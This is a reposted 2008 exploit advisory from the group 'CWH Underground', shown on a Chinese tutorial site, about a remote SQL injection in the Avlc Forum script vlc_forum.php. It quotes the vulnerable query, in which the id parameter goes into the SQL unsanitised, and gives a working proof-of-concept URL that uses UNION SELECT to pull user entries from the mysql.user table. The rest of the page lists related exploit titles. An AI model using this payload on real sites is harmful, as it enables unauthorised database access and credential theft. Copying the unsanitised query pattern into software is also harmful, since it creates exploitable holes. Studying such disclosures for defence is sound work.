手机
当前位置:查字典教程网 >网络安全 >Exploit >Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
摘要:====================================================================Av...

====================================================================

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

====================================================================

,--^----------,--------,-----,-------^--,

| ||||||||| `--------' | O .. CWH Underground Hacking Team ..

` ---------------------------^----------|

`_,-------, _________________________|

/ XXXXXX /`| /

/ XXXXXX / ` /

/ XXXXXX /______(

/ XXXXXX /

/ XXXXXX /

(________(

`------'

AUTHOR : CWH Underground

DATE : 12 July 2008

SITE : cwh.citec.us

#####################################################

APPLICATION : Avlc Forum

VERSION : N/A

VENDOR : N/A

DOWNLOAD : http://www.easy-script.com/compt.php?id=2147

#####################################################

-- Remote SQL Injection ---

---------------------------------

Vulnerable File [vlc_forum.php]

---------------------------------

@Line

141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";

142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());

-------------

POC Exploit

-------------

[ ] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--

#####################################################################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos

Special Thx : asylu3, str0ke, citec.us, milw0rm.com

#####################################################################

【Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability】相关文章:

Dreampics Builder (page) Remote SQL Injection Vulnerability

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

webEdition CMS (we_objectID) Blind SQL Injection Exploit

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

精品推荐
分类导航